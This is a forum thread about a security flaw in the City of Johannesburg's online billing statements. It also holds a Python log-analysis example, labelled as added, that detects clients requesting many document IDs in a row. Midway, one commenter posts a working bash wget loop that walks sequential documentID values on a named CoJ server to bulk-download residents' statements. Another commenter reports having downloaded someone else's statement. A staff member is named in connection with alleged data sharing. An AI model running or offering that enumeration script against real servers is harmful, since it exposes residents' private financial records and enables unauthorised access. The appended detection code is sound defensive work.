City of Joburg security flaw exposes private info

Did they also pay R143m and use those little kids that made the Free State government's WordPress website?
 
How can one change details with the information? The login doesn't use the account number and pin as far as I can tell...
 
Worst part still to come: A ton of security companies will now fill out tender forms and taxpayers will pay millions to fix a simple software development/architecture (a major rookie mistake - whoever the IT service provider is, should really look at their review & QA process). Makes one wonder how many more leaks like this exist and how much of this information is currently misused.

Quite scary how lenient CoJ is with collections (but then again, who knows if those invoices are correct to begin with).
 
I warned everyone months ago that the passwords are stored as plaintext.

Furthermore, the CoJ changed my email address to a debt collection company to receive my statements! I spent months harassing the individual in question, yet they denied everything.

The individual in question is Chrissenda Jacobs <[email protected]>; a quick search reveals http://www.in-quest.co.za/ to be a "Commercial Debt Collection and Consumer Debt Collection" agency.

So even if this were the case, CoJ is happy to share your information with just about anyone!
 
That In-Quest site has been hacked as well:

This Site has been hacked by 0NullSec!

No Damage has been done to the site!

Admin please Secure your site!
 
Just for fun, here's a little bash script if you want to download a bunch of those:
for i in `seq -w 0 999999`
do
wget -c --content-disposition "http://cojestatements.co.za:8080/cojpdfweb/getPDF?documentID=112001$i&download=true"
done


Let's see who can get the most :p

But seriously, don't use this. Do not.
 
Holy s**t!!! I've just downloaded someone's statement, nooooooo this is so wrong, heads must roll.
 
I would never even consider it...
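
Seen from the server side, the sequential documentID requests discussed in this thread stand out in the web server's access log. The following is an added example, not part of the thread and not CoJ's code, that flags clients requesting many distinct documentID values from getPDF in a short window; the log format, sample lines, IP addresses, date and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common-log-format request line for the getPDF endpoint named in the thread.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /cojpdfweb/getPDF\?(?P<qs>\S*) HTTP/[\d.]+" (?P<status>\d{3})'
)
ID_RE = re.compile(r'(?:^|&)documentID=(\d+)')

def find_enumerators(lines, window=timedelta(minutes=5), max_distinct=3):
    """Return {ip: (peak distinct documentIDs in any window, distinct IDs served
    with HTTP 200)} for clients above max_distinct. Thresholds are assumptions."""
    hits = defaultdict(list)  # ip -> [(time, documentID, status)]
    for line in lines:
        m = LINE_RE.match(line)
        doc = ID_RE.search(m["qs"]) if m else None
        if not doc:
            continue  # not a getPDF request, or no documentID parameter
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[m["ip"]].append((ts, doc.group(1), m["status"]))
    flagged = {}
    for ip, events in hits.items():
        events.sort()
        start = peak = 0
        for end in range(len(events)):
            # Slide the window forward: drop events older than `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, len({e[1] for e in events[start:end + 1]}))
        if peak > max_distinct:
            # The 200s are the documents actually disclosed to this client.
            served = {e[1] for e in events if e[2] == "200"}
            flagged[ip] = (peak, len(served))
    return flagged

SAMPLE = [  # constructed log lines; IPs are from documentation ranges
    # One client walking eight consecutive IDs, one request per second.
    *(f'203.0.113.9 - - [01/Jan/2020:10:00:{s:02d} +0200] "GET /cojpdfweb/getPDF'
      f'?documentID=112001{s:06d}&download=true HTTP/1.1" {200 if s % 2 else 404} 0'
      for s in range(8)),
    # An account holder fetching the same statement twice.
    '198.51.100.7 - - [01/Jan/2020:09:00:00 +0200] "GET /cojpdfweb/getPDF?documentID=112001555555&download=true HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2020:09:30:00 +0200] "GET /cojpdfweb/getPDF?documentID=112001555555&download=true HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    print(find_enumerators(SAMPLE))
```

The count of distinct IDs served with status 200 gives a first estimate of how many statements a flagged client actually retrieved.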
 